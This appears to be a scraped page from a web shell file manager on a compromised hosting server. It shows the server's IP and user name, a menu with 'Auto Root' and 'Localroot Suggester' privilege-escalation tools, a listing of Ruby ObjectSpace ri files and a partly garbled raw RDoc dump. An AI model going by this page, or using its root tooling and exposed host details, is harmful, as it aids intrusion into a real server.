Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
ObjectSpace /
Delete
Unzip
Name
Size
Permission
Date
Action
InternalObjectWrapper
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
WeakMap
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
_dump-c.ri
258
B
-rw-r--r--
2024-06-26 17:25
_dump_all-c.ri
270
B
-rw-r--r--
2024-06-26 17:25
_id2ref-c.ri
234
B
-rw-r--r--
2024-06-26 17:25
allocation_class_path-c.ri
809
B
-rw-r--r--
2024-06-26 17:25
allocation_generation-c.ri
871
B
-rw-r--r--
2024-06-26 17:25
allocation_method_id-c.ri
862
B
-rw-r--r--
2024-06-26 17:25
allocation_sourcefile-c.ri
533
B
-rw-r--r--
2024-06-26 17:25
allocation_sourceline-c.ri
545
B
-rw-r--r--
2024-06-26 17:25
cdesc-ObjectSpace.ri
3.22
KB
-rw-r--r--
2024-06-26 17:25
count_imemo_objects-c.ri
1.13
KB
-rw-r--r--
2024-06-26 17:25
count_nodes-c.ri
1020
B
-rw-r--r--
2024-06-26 17:25
count_objects-c.ri
1.28
KB
-rw-r--r--
2024-06-26 17:25
count_objects_size-c.ri
1.09
KB
-rw-r--r--
2024-06-26 17:25
count_symbols-c.ri
1.33
KB
-rw-r--r--
2024-06-26 17:25
count_tdata_objects-c.ri
1.54
KB
-rw-r--r--
2024-06-26 17:25
define_finalizer-c.ri
2.49
KB
-rw-r--r--
2024-06-26 17:25
dump-i.ri
846
B
-rw-r--r--
2024-06-26 17:25
dump_all-i.ri
1.53
KB
-rw-r--r--
2024-06-26 17:25
each_object-c.ri
1.5
KB
-rw-r--r--
2024-06-26 17:25
garbage_collect-c.ri
309
B
-rw-r--r--
2024-06-26 17:25
garbage_collect-i.ri
308
B
-rw-r--r--
2024-06-26 17:25
internal_class_of-c.ri
679
B
-rw-r--r--
2024-06-26 17:25
internal_super_of-c.ri
703
B
-rw-r--r--
2024-06-26 17:25
memsize_of-c.ri
761
B
-rw-r--r--
2024-06-26 17:25
memsize_of_all-c.ri
1.21
KB
-rw-r--r--
2024-06-26 17:25
reachable_objects_from-c.ri
1.99
KB
-rw-r--r--
2024-06-26 17:25
reachable_objects_from_root-c.ri
535
B
-rw-r--r--
2024-06-26 17:25
trace_object_allocations-c.ri
1.13
KB
-rw-r--r--
2024-06-26 17:25
trace_object_allocations_clear-c.ri
413
B
-rw-r--r--
2024-06-26 17:25
trace_object_allocations_debug_start-c.ri
315
B
-rw-r--r--
2024-06-26 17:25
trace_object_allocations_start-c.ri
412
B
-rw-r--r--
2024-06-26 17:25
trace_object_allocations_stop-c.ri
598
B
-rw-r--r--
2024-06-26 17:25
undefine_finalizer-c.ri
374
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::NormalModule[iI"ObjectSpace:ET@0o:RDoc::Markup::Document:@parts[o;;[ : @fileI"!ext/objspace/lib/objspace.rb;T:0@omit_headings_from_table_of_contents_below0o;;[ ; I""ext/objspace/object_tracing.c;T; 0o;;[ o:RDoc::Markup::Paragraph;[I"JThe objspace library extends the ObjectSpace module and adds several ;TI"9methods to get internal statistic information about ;TI"object/memory management.;To:RDoc::Markup::BlankLine o;;[I"NYou need to <code>require 'objspace'</code> to use this extension module.;T@o;;[ I"EGenerally, you *SHOULD NOT* use this library if you do not know ;TI"Iabout the MRI implementation. Mainly, this library is for (memory) ;TI"Gprofiler developers and MRI developers who need to know about MRI ;TI"memory usage.;T; I"ext/objspace/objspace.c;T; 0o;;[ ; I"!ext/objspace/objspace_dump.c;T; 0o;;[ o;;[I":The ObjectSpace module contains a number of routines ;TI"Ithat interact with the garbage collection facility and allow you to ;TI"2traverse all living objects with an iterator.;T@o;;[ I"QObjectSpace also provides support for object finalizers, procs that will be ;TI"Gcalled when a specific object is about to be destroyed by garbage ;TI"+collection. See the documentation for ;TI"L<code>ObjectSpace.define_finalizer</code> for important information on ;TI"&how to use this method correctly.;T@o:RDoc::Markup::Verbatim;[ I" a = "A" ;TI" b = "B" ;TI" ;TI"QObjectSpace.define_finalizer(a, proc {|id| puts "Finalizer one on #{id}" }) ;TI"QObjectSpace.define_finalizer(b, proc {|id| puts "Finalizer two on #{id}" }) ;TI" ;TI" a = nil ;TI" b = nil ;T:@format0o;;[I"_produces:_;T@o; ;[I" Finalizer two on 537763470 ;TI"Finalizer one on 537763480;T;0; I" gc.c;T; 0o;;[ ; I" gc.rb;T; 0; 0; 0[ [ [ [[I" class;T[[:public[ [:protected[ [:private["[I" _dump;TI"!ext/objspace/objspace_dump.c;T[I"_dump_all;T@W[I"_id2ref;TI" gc.c;T[I"allocation_class_path;TI""ext/objspace/object_tracing.c;T[I"allocation_generation;T@_[I"allocation_method_id;T@_[I"allocation_sourcefile;T@_[I"allocation_sourceline;T@_[I"count_imemo_objects;TI"ext/objspace/objspace.c;T[I"count_nodes;T@j[I"count_objects;T@\[I"count_objects_size;T@j[I"count_symbols;T@j[I"count_tdata_objects;T@j[I"define_finalizer;T@\[I"each_object;T@\[I"garbage_collect;TI" gc.rb;T[I"internal_class_of;T@j[I"internal_super_of;T@j[I"memsize_of;T@j[I"memsize_of_all;T@j[I"reachable_objects_from;T@j[I" reachable_objects_from_root;T@j[I"trace_object_allocations;T@_[I"#trace_object_allocations_clear;T@_[I")trace_object_allocations_debug_start;T@_[I"#trace_object_allocations_start;T@_[I""trace_object_allocations_stop;T@_[I"undefine_finalizer;T@\[I" instance;T[[;[ [;[ [;[[I" dump;TI"!ext/objspace/lib/objspace.rb;T[I" dump_all;T@�[@z@{[ [U:RDoc::Context::Section[i 0o;;[ ; 0; 0[I"!ext/objspace/lib/objspace.rb;TI""ext/objspace/object_tracing.c;TI"ext/objspace/objspace.c;TI"!ext/objspace/objspace_dump.c;TI" gc.c;TI" gc.rb;TI"lib/cgi/session.rb;TI"lib/drb/weakidconv.rb;TI"lib/weakref.rb;T@GcRDoc::TopLevel